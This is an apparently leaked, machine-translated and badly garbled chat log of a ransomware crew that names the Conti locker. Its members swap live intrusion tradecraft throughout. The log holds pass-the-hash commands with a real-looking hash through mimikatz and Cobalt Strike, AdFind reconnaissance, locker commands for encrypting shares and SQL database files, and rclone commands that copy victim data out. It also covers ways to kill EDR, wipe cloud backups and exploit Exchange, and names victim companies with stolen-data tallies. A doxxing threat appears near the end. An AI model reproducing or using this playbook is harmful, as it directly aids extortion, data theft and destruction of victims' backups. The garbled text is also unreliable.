as in viam StorageCraft who decrypted the cracks? SHUT UP AND TAKE ME FULL INFO!111 and 50 rows by 50 rows to query the tables to watch the database then dump the clear pass will query all the mssql servakina based no Spaaahohoro we need the combine to roll up not the fact that there is a webapp, or separately look for this webapp not climesf dump hashioni lie in clear veb the appa "writes" in the base in config[ ](https://stylebrooks.com/group/general?msg=eJuSrgKkk8W7Yumcy) hmmm well if it's on gitecac i've already said it's a tricky way to do it more options? yes, where is the target process on the DB server? where are the creeds? msf can dump sa creeds, i think there is a similar solution on the git sql management studio involves opening an rdp on which you can palp cobalt session - to catch a detection adoado the easiest and safest option that do not palnutsya usually these creds are in the configuration of web applications want to pump the manual can and not only her polling I ask why is it MsSql admin account is of course she has a creds or what is where as the account is where to get it? so stop sqlcmd under the VPN) hhm on a remote host from under the VPN sa sqlcmd under the account sa What options for polling the database has except SQL Management Studio hoisting the session and injection in sqlservr? @all those without cases - in pm+ @all attention everyone, who needs to reset the session SonicWall need to work with today directly - write to the PM thank you I will try it thank you http://habr.com/ru/post/441166/ https://www.ise.io/casestudies/password-manager-hacking/ who can do something with the 1Password database?
foreach($line in Get-Content .\file.txt) { if($line -match $regex){ # Work here } } ``in the loop, for examplepowershell Get-WmiObject -Class win32_logicalDisk `-ComputerName IP ` | ft DeviceID, @{Name="Free Disk Space (GB)";e={$_.FreeSpace /1GB}}, @{Name="Total Disk Size (GB)";e={$_.Size /1GB}} -AutoSize Can someone tell me how to specify the ip address file correctly, so I don't have to type them separated by commas? tried : `(Get-Content C:\programdata\list.txt)` but it says it's wrong argument output:
```
#< CLIXML
Get-WmiObject : Cannot validate argument on parameter 'ComputerName'. The argument is null or empty. Provide an argument that is not null or empty, and then try the command again.
At line:1 char:54
+ Get-WmiObject -Class win32_logicaldisk -ComputerName (Get-Content c:\programdata ...
+                                                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Get-WmiObject], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.PowerShell.Commands.GetWmiObjectCommand
```
anyone rolled ? 
let me play :)thxxm `` adfind.exe -b dc=domain,dc=local -f "(objectcategory=person)" > C:\Programdata\ad\domain\ad_users.txt adfind.exe -b dc=domain,dc=local -f "objectcategory=computer" > C:\Programdata\ad\domain\ad_computers.txt adfind.exe -b dc=domain,dc=local -f "(objectcategory=organizationalUnit)" > C:\Programdata\ad\domain\ad_ous.txt adfind.exe -b dc=domain,dc=local -subnets -f (objectCategory=subnet)> C:\Programdata\ad\domain\subnets.txt adfind.exe -b dc=domain,dc=local -f "(objectcategory=group)" > C:\Programdata\ad\domain\ad_group.txt adfind.exe -b dc=domain,dc=local -gcb -sc trustdmp > C:\Programdata\ad\domain\trustdmp.txt ``trustanddmp ``nltest /trusted_domains ``remember the command to poll the trustdmp ? without a crude can be? from yes to one@alter what is the manual to hunt and drag terrabytes! it's through the S3 repository implemented? o_unreal, alas, there's a battlefield here whose rocket is cooler - and he wins, so we build rockets constantly)so it's not scary) we have everything here and so requires constant support)through any channel of any software in theory there are different ways to play in principle we have someone who writes put the tz - let's make a simplea it's perl-likehttp://github.com/RhinoSecurityLabs/external_c2_frameworkhttps://www.cobaltstrike.com/help-externalc2https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/ no, you do not understand a little now show the detects well I still do not have time to figure it out - if you have the desire - better to dig in this direction then http://github.com/Und3rf10w/external_c2_framework like this, but if you are interested - cobalt has external c2 and tacda, a complete framework@all https://blog.dylan.codes/shad0w/ interesting enough "fresh" framework if you have time and interest - i recommend to poke around, but viola correctly hinted that you can put the client on the remote with the VPN just
if you have crones, it's hard to answer, but i do not really understand why you need sox in this chain? why not open a VPN immediately with the right part?Maybe there is some ssh access, where you can clean up with commands.I at least have not seen a two-factor on vmik or psekespopryt try through wmiexec shell open and forti process put out if there Hyper-V mikrosoft at least if you put out the hypervisor but you and all the virtuals it hosts will fall off, no? but let's know sansp. no time. admin put out the internets on it kerberos tickets for example can be requested to get rights to shared resources this hash machine for SPN you after pth should do stiltoken this process : ``` | PID 17844 | TID 8412 | LSA Process is now R/W ``` which runs under the token you hackypants well if it is a live machine acct should work ... you can also try through the laughs, also should work cme smb 127.0.0.1 -u TRUCAMTLBK4\$ -H c028fc26ba545c599adbb9b7e26964d1 -d trudeaucorp.como very defensible bekapseven in the brow here admin me worked 100% lm there whatev msf lm:ntlm suyumimik eats ntlm immediately in kobena et understandably) lm:ntlm?ntlm simpler like that śhatakoy should be ntlmc028fc26ba545c599adbb9b7e26964d1:c028fc26ba545c599adbb9b7e26964d1msfom then all bypass everything try - /user:TRUCAMTLBK4\$.salt is what but I may not mimic the correct way `` beacon> mimikatz sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1 [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1 command [+] host called home, sent: 750703 bytes [+] received output: user : TRUCAMTLBK4$ domain : trudeaucorp.com program : cmd.exe impers. : no NTLM : c028fc26ba545c599adbb9b7e26964d1 | PID 17844 | TID 8412 | LSA Process is now R/W | LUID 1 ; 2572284471 (00000001:9951f237) \_ msv1_0 - data copy @ 000001CC19EF7DD0 : OK ! 
\kerberos - data copy @ 000001CC1A834828 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001CC17DA3948 (32) -> null beacon> shell dir \\\TRUCAMTLBK4\c$ [*] Tasked beacon to run: dir \\\TRUCAMTLBK4\c$ [+] host called home, sent: 51 bytes [+] received output: You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network. ``And the ptx how? So give me the hash of the machine and the login in TRUCAMTLBK4\$ format, you can safely stick it into the msf. admin is very clever about hiding backups. urgentonasar have a domain need access to the machine will this work and how to get it right We'll have to dump all the hashes and try to authenticate with the machine hash Target is TRUCAMTLBK4 hash the output is ``9051 TRUCAMTLBK4$ c028fc26ba545c599adbb9b7e26964d1 528384 ``` how to shoe the hash \ token to start the machine? command\session at least what is my@all issproduce.co.uk remind someone who has a mesh in work small thismasonry is aware of the problem, they are working on it, when the fix will notify separately and ask for a ficc in #all_manuals there is a manual how to remove the bulk of the tasklist. Look for sqlserv and on these servers, look for local drives and look for .mdf code Yes, , there is such,. The database on the special control is always noticed following bug We will locate, e.g. servers through Mount, use batch file handler.bat to stop the database and services Locker locker.exe -nomutex -m net - size 20 -p \\host\c$ As a result we get the following situation: The locker goes through the whole disk, but 90% of the time it misses the .mdf file. 
C:\Program Files\Microsoft SQL Server\MSSQL12345\Data\database.mdf At this point, I strongly recommend that everyone pre-create the mass-tasklist and look where the .mdf is and locate the entire folder with the dira above Lock like this: ```locker.exe -nomutex -m net -size 20 -p "\\host\c$\Program Files\Microsoft SQL Server\MSSQL12345" ``` Removed path MUST be in quotes, because without the quotes will be a syntax error. If everything is OK, the locker almost immediately takes the files into processing and by the date of change it is visible at onceprincezvhhitechTyr@all https://continews.pro news domain is banned the replacement https://continews.icuVano@Air give hell here in the new rocket it already is so do it so do you want to tell all? @all who is that Kulibin who started it from memory, call me back who wrote that you can publish so did you fill it? https://github.com/djhohnstein/SharpChromium
```
Usage: .\SharpChromium.exe arg0 [arg1 arg2 ...]
Arguments:
  all     - Retrieve all Chromium Cookies, History and Logins.
  full    - The same as 'all'.
  logins  - Retrieve all saved credentials that have non-empty passwords.
  history - Retrieve user's history with a count of each time the URL was visited, along with cookies matching those items.
  cookies [domain1.com domain2.com] - Retrieve the user's cookies in JSON format. If domains are passed, then return only cookies matching those domains. Otherwise, all cookies are saved into a temp file of the format "%TEMP%\$browser-cookies.json".
```
jumping sanctinel there mani did a paleoload today, how's it going? @all there's free access, write to whoever needs it,``tout here. Fort Scott Munitions, and Fort Scott Christian Learning Center? ``` not our case by any chance? 
i'll upload it because i can't get into the admin area, i can't get into the tor apparently it's lagging) tell me how to ask for 2 files, not leoni there requested folders listing sent it to you guys there are still pts schmiffed 1.done.generalinsulation.com a lot of data was on the servers? why not rename it) to mail the pts all still tapped there ``generalinsulation.com 7 Servers 117Works Mega: Info uploaded to the server 185 gb info General Insulation Company is an insulation distributor/supplier that stocks and manufactures a wide range of industrial, commercial and fire protection products for the construction market. With an extensive network of strategically located warehouses and manufacturing facilities, General Insulation is uniquely positioned to meet customer needs in a timely manner with products that meet their specific requirements. Revenue: Couldn't find info Locker: Conti Works: Air,Twin,Steven ``Weigh up the disk, go to the file-sharing site where we downloaded all the info ``but I don't know, they've got like 100kkk in revue, that's basically enough so 117 vorks in the net all downloaded everything ``info185 gig@Air pass a couple sessions on the new cobus webroot fuckin' servers have webroot ``there are webroots``?i will pull them to the kobud if its webroute not zagalnufu def on the servers there how many we have and on what server ? and run the locker the best way to get it off the fuck or what else is there ? 
and defender there offniservers pull in the new kobud any dsotupny voshmi yes pull them the fuck their pings still pinging then task to this batnik `` @ECHO OFF rundll32.exe C:\ProgramData\appman.dll,GetStdHandle ``with this kind of text, that is, you create a batch file which you drop with tascomnova1 dllprinethe vorkservices data downloaded and put it together with the dll in the program, let's tighten it with a batkin and make it nice pinging your hostmix is disabled only on vork if vmik is disabled twin fucks with shuffles`` name.dll, GetStdHandle ``Let's go like this, I'll give you dll and propsdashayte dll from any new coba@Air good morning raspingovyat there so gentlemen, how many dates downloaded ?2 I understand the inventory and disk, disk (2) on the logger things click?)) to remove from the center cue securely, which of the buttons to press? 1. Control Panel -> Internet Options -> Advanced (tab) -> Security -> mark only "Use TLS 1.1" and "Use TLS 1.2 2. Control Panel -> Internet Options -> Security (tab) -> Trusted Sites -> Sites put "add this website to the zone:" https://url_ip_site_gateway ``` this is how the problem was solveda I support it and do not take people from forums, it is easier to bring up your own rocket where the manuals within the confines of the clippings to give the tooltip: do not work for 2 days - out, did not like it - out. normal guys easily pass such tests. i support the sandbox for newcomers should be done similarly))) myself and @fly remember) there's nothing in the archive except that there's nothing in the public. in fact, it could happen to anyone, remember how you were trained)) well, probably should not have given newcomers a case))) just keep on the net, let them take notes. 
the main thing is to let the newcomers know how to do it )) just let him take notes online)) and while you're looking at it even manually to install the msf on the vpstam it's been walking on the net and so on)) how come there's sorting hell moyd there are clearly our manuals the ngrock and econnect are unlikely coincidences, i wonder if it's the same ngrock script that me and Tony wrote two years ago. where's yours from? :))) I'm in touch, write me when something appears. Hi. Happy New Year. Got it. )anyways sessions to reshoot kobyda no matter what I did not) I have 4.2 kobyda not downloaded) hi, have you anything to do? or all already downloaded? 1 minsheshady look it in the new roketesentinel not leak it without a "jump? "what is the trable to remote dump lsaas? about? buksuem (from March 24?) https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/ if so, tell me how anyone set the sharkhrom master key when collecting passwords, how to shred the windup server before you give it to the trash? I know about the nicks, if anyone needs to write, all sizes ..., my head is no longer thinking ... got it) thanks, let's try the fact 5-10 probably still add that the files will be old files that the locker does not touch udetob that is 260tb lock will be somewhere 26tb +-no, this locate at %10 just from the file-size 10 is the threads correctly understand? earlier just let in without increasing the flow, now I have to) gigabit 5 at us would kick - ok, 5 pieces like him will probably catch upInteresting what channel localka\nasa =) and how many disks? size nasa 600tb)) occupied 260tb400 ball, and what size is it all? 1-2tb? You probably just created a lot? ``Locker.exe -nomutex -size 10 -m net -p \\nas\papk1 ``and then use \nas\papka1 /user:.``admin pass in theory the mountain not on the letter too mountain +- the same folders in the population of pieces 400)from 1 pc (server) in 1 us... 
mbr else try to attach ALL the balls on the 1 pc and he himself will see them and zamazhitEast NAS, a bunch of folders, will probably have to do a few PCs to full ball with the disks, how to make the lock as quickly as possible went only on the balls attached, the 1 pc prio 15-20 balls ?) If the remote computers will be disks with a summary size of 0 bytes? You can trim a folder or something not particularly necessary if we are talking about C $ Reformulate, what is the question? Hi all, how can you get the quickest possible lock on the balls only, if primaunchenno on each pc will be full disks? i think you can do it in tobot, but i can't figure it out exel is not doing it right? it's also searchable with ost pst viewer http://www.ostpstviewer.com/ mail pst file? Import it into your outlook and search) Guys, you need to do a keyword search in all the mail downloaded from the user, who has advice? @all better to buy a license for 20-30 bucks@all does anybody use kmsauto++ to activate windows? No, but there was a file with passwords somewhere in the classics.and how did you get the codes in ssh, were they default?I don't know if it worked in barracuda, but I'm not sure about synchronization, if it's going to wipe it in the cloud, is there an ssh? and how will you get into it? but it's possible to get into the hardware and wipe everything with ssh. 
There's some kind of FS, can't remember the name right now, but there's software on githab that allows you to wipe everything in the command.Webadmin into the external domain https://auth.datto.com/login and yes, there's a webadmin and it can be on a two-factor, like barracuda it's got redundancy set up in the cloud barracuda has the same system, no option to delete from the cloud as such but if you overwrite your backups on the stack, they should be deleted from the cloud as well, because there's synchronization there://invenioit.com/datto-backup/ see, there's a piece of hardware aka backup server (physical), aka backup software, aka backup storages through the web panel ? datto also self barracuda backup encountered? with viam everything is cool, but with datto not so simple not the first and not the second time we run into datto what is your questionnea, was 2fa@all Datto backup someone gutted? Has anyone used the FortiBrute that was written for us? In the personal area please knock.cisco EDR hard stops the locker in the form of eexe and dll. But if you run the dll through PS and regsvr32.exe If you run the dll through PS, regsvr32 exe, then the cisco is already starting to fart, and the locker will workooOne more time to run veeam.exe If you're talking about rd you do legitimate actions fuck itWho from under the carbon viam decrypted? @all once again to all we have a ton of downloaded databases, LET ME have them, we will make bots out of them)))) searches the contents of all the docks in the ball via keywords or regularshttp://github.com/blacklanternsecurity/manspider a very useful tool can be the same process explorertoolsa says it kills EDRs: //www.kitploit.com/2021/07/backstab-tool-to-kill-antimalware.html?m=1@all Urgent report who has these in operation!!!! bobpoynter.com silverspot.net In PM with the current status on the case!!! 
@all tell me whose it is plizsysadmins go to them, hash it out print service on the print server no one will turn it off (unlike KD, for example) and patches on the print server may not drop by so often, even when they will my main idea is to just the print server through it? hmm? why does it not work with me =) why does it work only on the dk? does it work on the dk or wherever it is? and this? @alliche? and muzzle into it pour the second slidechnaya exactly, we did so, cops :) and all from a virtual machine ruberyprofit it cling to Deploy virtual machine take a dedicata allocated bullshit =) session cuts network proactive rephrase - when you connect a VPN falls off the external adapter tymka not help, ngrok toorebota, anyone had a Fortica, that when you connect to a VPN can not get up a session on the VPN and within the network, too? how to solve this problem? so throw in the adminWho exit on the brute force? a couple of kerbs should runsubd with soaps means any database that contains email addressessubd with soaps means .ost or .pst file? @all please check the date on your cases, where there is a DBMS with soaps and write in the PM me the number, make them work further) who already do a color 2021 1675 ?@rozetka skim here here's also just looking for scripts to replace the work of sharpviewdobviously) now dovavlyuyut admin :) i want you to evaluate who itt what manu)? 500 strings almost!i want to know what the fuck is up with this manual? is there anybody there? i'll try to set up a free download, maybe it will work.burp suite you can use manual to configure if you also have tools will be great :) guys, did anyone work with webform brute force? 
need help breaking the admin which poppobuyishey creed) so you just do not have a creed, also access deny write I'm trying all this from the dc itself ``t3chnolog the server itself is in the domaincontroller group like everyone else ``` if your target machine is in a domain - to bypass NLA you need to start a car in this domain get a trust contextNLA error hangs because you from an untrusted source try to get into the domain (i.e. from a group or vpn who are not in the target domain where the machine you need is? winrm/wmic/schtask/psexec/rdravtorizationyou have all ports open vashchetashcha try it outentf through the DC and you through ipak address. i think this was the tie-in when i had this error. xfreerdp bypass xfreerdp yuzaytrss://blog.cobaltstrike.com/2015/07/22/winrm-is-my-remote-access-tool/ but it is rarely opened so it is unpopular as well as youzayut vmic and stask google commands5985 how to get it? https://prnt.sc/xrgh783389 not allowed by rp5985 - WinRM3389https://prnt.sc/xrfwu4 question: how to pop in there canENIGMA Status: Ativo Sistema operacional: Windows IP: 192.168.3.101 MAC: 78:E7:D1:CC:3C:88 Fabricante: Hewlett Packard NetBIOS: HVC\ENIGMA Usuário: Tipo: Data: Comentários: Serviço Detalhes RDP Tunnel is Microsoft SChannel TLS: unknown service Port 135 (TCP) Microsoft Windows RPC Port 139 (TCP) Microsoft Windows netbios-ssn Port 445 (TCP) Microsoft Windows Server 2008 R2 - 2012 microsoft-ds Port 2179 (TCP) Port 3050 (TCP) Firebird RDBMS Protocol version 10 Port 3389 (TCP) Tunnel is Microsoft SChannel TLS: unknown service Port 5432 (TCP) PostgreSQL DB Port 5985 (TCP) Microsoft HTTPAPI httpd 2.0 SSDP/UPnP Port 47001 (TCP) Microsoft HTTPAPI httpd 2.0 SSDP/UPnP Port 49152 (TCP) Port 49153 (TCP) Port 49154 (TCP) Port 49155 (TCP) Port 49156 (TCP) Port 49157 (TCP) Port 49163 (TCP) |C:\Programdata C:\SistemasHD On ENIGMA 192.168.3.101 HVC Hewlett Packard 78:E7:D1:CC:3C:88 135, 139, 445 
\\192.168.3.35\c$\SistemasHD hostname=192.168.3.101 [DATABASE] database=bd0240 [USUARIO] username=EDUARDOR codHospital=1gayz hi all, can anyone suggest something, the server is closed with backups, not by pehek not by explorer there by entering the folders is not included. the server itself in the domaincontroller group like all, in the DC no bans, most likely it locally inside the machine is covered, while there is a database, which works all clients in the network.and qubes os not felt? it is like a Band-Aid try it once and like it agadas who's more comfortable i'm just not very good with docker = )pull the script on the ensemble just in casesee what the server writes after you try to connectwmic logicaldisk get volumename,size,freeespace,caption,filesystem,drivetype,subscrirtionBoyce, how do you know how much weight the ball in the cob?This is the first time I've seen such an error....windup! java version "15.0.2" 2021-01-19data java seems to have been updatedcertin in thread "main" java.awt.HeadlessException: No X11 DISPLAY variable was set,are you sure that you run it on the X it swearsstaraajavaGreetings all, a question on the new coba, according to the installation manual, when checking ``` "Check our profile, go to /root/cobalt sudo ./c2lint domain.profile" ``` kicks out
```
Hook start
Found desired class: common/Authorization
Exception in thread "main" java.awt.HeadlessException:
No X11 DISPLAY variable was set, but this program performed an operation which requires it.
        at java.desktop/java.awt.GraphicsEnvironment.checkHeadless(GraphicsEnvironment.java:165)
        at java.desktop/java.awt.Window.<init>(Window.java:545)
        at java.desktop/java.awt.Frame.<init>(Frame.java:423)
        at java.desktop/javax.swing.JFrame.<init>(JFrame.java:224)
        at aggressor.MultiFrame.<init>(Unknown Source)
        at aggressor.Aggressor.main(Unknown Source)
```
I've googled errors, i've installed all suggestions, and the result is the same: this error. 
Suggest who faced with add more when not dbo but dmnu if it goes, it's obviously easier than the hands, yes) it's not hard talkkak how to do otherwise I hzya in a 3 query ddb handwritten, and the tables in the variables, it for each line will give out yep but in the third query you would have to substitute two variables in three steps database query query the tables in the name ala %DB%.txt and there tables and then polling from %DB% each row as %tables%from under cobalt kst mbmbl will either go or fuck it up, I don't know)`` @echo off for /F %%i in (db.txt) do sqlcmd -S localhost -E -Q "USE %%i SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" >> tables.txt ``but try it this way, I do not know if it will go or not that's the question and the crutch should be invented instead of a couple of hours of routine substitute tables databaseskl you do not turn a query into a batinck that went to the server with the database, enabled, then purely 1-5 tables needed sdamil. everything. success. 
minutes for 20 or pvsh codekak it all in batinck turn the question is that I turned it by hand Tovibinu ``` sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName ``` instead of %databasename% - a string from a file - you can do it through skl syntax, maybe not, googlea then you need to substitute the string from the file into skl query, one by one `` sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases; >> db.txt" ``` you get the list of databases as a file, delete unnecessary rows if you have a login and passwords can connect via sox through any toolzoo and very quickly browse the smirinado that he questioned all the databases for tables and a dozen rows from each table yesterday i searched the server there were 30 databases and tables with all sorts of shit, it takes 300 clocks to poll each table it should be avtmoatizirovat context let's say the correct made - through the scratch management studio or through slserv the list of databases, tables, the first 10 rows in each table so if you need it for authorization through the Codes can throw a simple batik or context uhu if it does not, you need to get involved and inject into the process sklserver, the session lift that is, what you need to unload the database and the tables you need sa login to the database, I want me to run a conditional batnick or unliner and it in response to me DATABASE tables examples from the tables if you're going under the token then what questionnaire, I can only give you the questionnaire by hand, if you mean authorization through the Credentials we can write anything if there is a normal TK and write a DB questionnaire? not to sit and drag DBs for a couple of hours, eh? how's that? 
it works on the test machine, it doesn't on the network, then form the question in as much detail as possible) and it doesn't, i just don't understand why the code doesn't work) there's a fuckload of developers and more but you need to tzpolzernyy)write the terms of reference is there anyone who knows c++ at a decent level? `` java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar $* any problem with cilance lately? the session does not allow to raise or it can not remove? no panel, rdp no cilance without a pass through the panel removed with a reboot-some proven method is needed, no fear if you need to reboot who knows how to disable cilance and rapid7 agents? slice https://forum.exploit.in/topic/182703/?tab=comments#comment-1168697 ))) judging by the correspondence log, the trance is getting pretty fucked up...the only thing i fucked up was my hashes and he fuckin' told me they were too fuckin' complicated I ended up having them on my physical car in two hours instead of his hyper-duperferm Talked to both ``` tranny and the cunt are having forum wars ``11tcp_bind_pipe``` Guys, and tell me another point, have rdp access to the machine, it is in the domain. I want to throw a coba, but no access to the Internet from the machine, I have user rights, and the other machines in the network Codes do not fit ```Tobshabla with bothPublished: 6 minutes ago TS. PMs in the last couple of years in my opinion the most stabile server, it's all fun and the server as I understand it is not only me) I see another "guru of the underground" looking for a student reseller ironkryptomaniak who made a bid ? 
mafia in da taunahahahsa deanon miki I'll buy sabj, dough get after verification of information from my deposit by transferring to my own. The time for checking is 7 days. Needed: Name, date of birth, city of birth Desirable: Scan of passport, any pre-information, any checks on the registration or real estate 2Mika, you fucked me up bitch, because of you, you bitch, yesterday the deal fell through, and not like your fucking 100-dollar deals, but a big fucking deal. You're fucked, I think they'll find you for 100k, if they don't find you, I'll look elsewhere, but you fucked me up so bad I wanted to find a person from the web for the first time in my life in real life ``what's the big deal,`` the guy's a mid-level sysadmin $100k at the most they give for deanon. they're paying 100k these days, these reverberators are engineers in stockings and cat ears, he's technically talentless, i had the misfortune to talk to him, he's miserable, and it's too bad he's got no fucking reputation, because he sold his rep account. what is that tranny doing there again?i don't know what the hell is going on there, i can't help but wonder if there's a problem with thesecure server or if it's just me? https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265 why when I try to connect over webrdp on sonic sma, i get auto-login to netextender's wpn? when i scan the pool through ais it writes dnshostnamewhat ways can i learn fdqn if nslookup does not see,and the domain to connect to the wpn is LocalDomain? in the cobalt channel where the new keith where?) thank you in continuation of exchenge https://github.com/jsdryan/CVE-2021-26855 googletranslate from chinese still translates and here's more from this morning. 
https://github.com/alt3kx/CVE-2021-26855_PoCCodeocta0dayinbiz@all those trying to get back in after the work is done - try this script if it is valid and works as expected - it was released on the forum7 hours agohttp://github.com/Udyz/CVE-2021-26855 CVE-2021-26855 Brute Force EMail Exchange ServerA where is it? Result ``https://dyncheck.com/scan/id/e9475dcf0a3efd9deaf3aa07a6147b5c ``Chuckhttps://github.com/KaLendsi/CVE-2021-1732-Exploit add me not marked who has this case@all cairncapital.com whose channel? @all have cases to work, write to who do not do I recommend nmap zenmap install on the grandfather and scan the locale in the scanner settings put rdp ftp http? https://prnt.sc/10gxp3z here so he sees the network, one iphttp://prnt.sc/10gxqmsdata on the grandfather session you raise the iphone?even if I have an ip scanner, what's the best way to scan the network, see the names of PCs, domains, etc., without having a point of entryroute print, like it should display the ip network, if I am not mistaken here is yes, there is an account, but for it the network, how to find? adfind -h -u domain\user -up password -subnets -f (objectCategory=subnet) > subnets.txt ``So get the info.`` you have domain creeds from the vpn have da no, well, I'm from scratch connected and do not know what's on the network if the AD is not spelled out - the input diap + where the root servers are to startsabnets assemble through the adfindbytes in AD not all sabas are not specifiedpingani all hosts and ipam make diapykaee have options to scan the network behind the vpn? 
@t3chnolog thanks for the tip, everything came out can take a dedic, plug it into the VPN, and on the dedic to put vBox and shared internet with the dedic by http type.and there cobalt start pinging the routing at all?the session was not raised from under the vpn?session either do not raise the session at all, or look for a segment that is not covered by proaktivkoy (you may not find) if your session drops, the VPN segment (and most likely all network segments) under a hard network proaktivkoytimver on the dedic, or enidesk, or ngrok@allGod are solutions to bypass the following problem when you start a VPN `(forti) on the dedicates stops tapping session, the VPN is started along with the breakage of rpd, I used to be that when you start up broke the rpd to the dedic but the session continued tapping and solved all through socket. How to be in cases when it stops knocking? How else can I skip ? in case network activity is monitored not to overload the channel? --bwlimit 5M limit download speed in 5 megabits, handy flag to pass "below the radar" )guys, salaam, has anyone raised rights through dll hijacking? @all c0ntiteam41@protonmail.com whose email? `` https://www.sendspace.com/file/n7n47e If anybody didn't know, you can filter files by date, for example --max-age option lets you specify how old files should NOT be uploaded ``` rclone.exe copy --max-age 3y "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P ``` This command will only load files not older than 2018, i.e. 2018-2021 more details - https://rclone.org/filtering/AdminSDHolder has anyone run it? 
it is the tricky implementation of the connection itself i have tried reverse sox implementations on verichel firewalls cut the tunnel on tsp sockets autorun holdsNo about my rath I told you somewhere on the damag wrote about plink ``` https://gist.github.com/moshekaplan/425c2a263c3e8a0b080d ``` not really got into it myself, tunnel but kinda sticks the averamische throw bro The linux is forty-two mb*, 40-50 min will be uploaded to sendspace, as soon as it will upload I will send you the link pass: bhju7tgh does anybody have a video of the ms17 manual? i'm not rooting for coba, just overall empire and other frameworks not only save time but also increase the possibilities to do it with coba-like software, a lot of moves in 2 clicks are done technically, but fuck the effort or you can use rpd and get passes in a minute you need to look at the situation there is no universal solutionindividual for the case is all in a normal avera claudnom you in 5 seconds will shoot and write out :) well, for a certain stage of development is necessaryhttp://www.cyberark.coba would have hung quietly hash is bad or hash pull on the folders, and on the computer mimic smell you do the same way they smellkakoy through smbclient aplolyadet stylak for example a software on the password passes from the clauds in the browser or in softet to trace the admins? 
why?What about coba, keylogger and other utilities, without coba it would be impossible to legally track admins, but not if you use a cleartext pass to move legitimate additems in the events, it would also need to be cleaned and hope that it will not be detected) starkillerethese software have including cobalt pailoada empire gui appeared and empiretoka in any case, any software to clean at home many coadic still uzuyuta che impaket not palpai?i want to find a solution that will drop sox4/5 into local network to work in 90% of networks and impacket to mess with networks :) found it. I'll check rantime also present in empire modules https://github.com/BC-SECURITY/Empire/blob/master/changelog not a bad alternative to coba by the way, there is a built-in module obfuscatorhttp://github.the module is not a bad alternative to cob, by the way, there is a builtin module refactorhttp://jpillora/chisel/hellaisenu in the releases of EXE? on dinchek can you refactor? AB all similar softwareshttp://github.com/jpillora/chiselchisel@all who deployed cob in a localized target? what solutions do you have? ssh is possible (in the process of release) what else? ideally FUD / lightweight software even without autorun yet any ideas / thoughts / solutions please Thank you. there was no such a problem before and you can access other servers through a proxy? ```` [*] Will use existing X509 certificate and keystore (for SSL) [+] I see you're into threat replication. /root/Cobalt/xxxx.profile loaded. [+] Team server is up on 48765 [*] SHA256 hash of SSL cert is: c9956501328161d839cd78b0d1ebf1cea6da5691d302ca0333bfc8acd4d49020 [!] Profile variant 'variant_1' does not exist. Degrading to normal profile state. [*] Web Server will use user-specified SSL certifcate [+] Listener: main-list started! ```` all ok on the server```` [!] 
Trapped java.net.SocketTimeoutException during client connect [dialog action: Connect]: Read timed out ```` tell me what could be causing this - does not want to log into the serverhttp://reconshell.com/cve-2021-21972-vcenter-rce-vulnerability-analysis/ check out this beauty@all forum/index.php?topic=47.0 a collection of tv channels and groups you may find useful or interesting@all those who have waited for more cases, write back, there are fresh dumps I do not always insert all the code, for example sharefinder i offered it as an alternative)) you'd better just import the code into pvsh without dropping it on the disk i suggested this as an alternative) psst is better to just import the code into a psst without dropping it on the disk - it may be very unpleasant if you catch a detection right before the lock) nimbus2000 and one more thing, because i heard from alta that someone had a psst script that doesn't start, this also applies to other ps1 scripts and those situations when the serversack without powershell isE Example: we have a script ``` examplescript.ps1 ``` The manual on the githab specifies to run it as a ``` .\examplescript.ps1 ``` and then the command ``` Invoke-ExampleScript -argument ``` run it and you get an error that there is no commandlet, this is because the commands are not pulled up so (I have not worked in any case) the solution is this: change the file extension from .ps1 to .psm1 - you get a plugin for the portshell Open normal powershell write ``` Import-Module .\examplescript.psm1 ``` With the next command we call the function ``` Invoke-ExampleScript -argument ``` we get a working script:thumbsup:Guys, who will be knocking filesilla from the accesses we got with SessionGopher to the servers. 
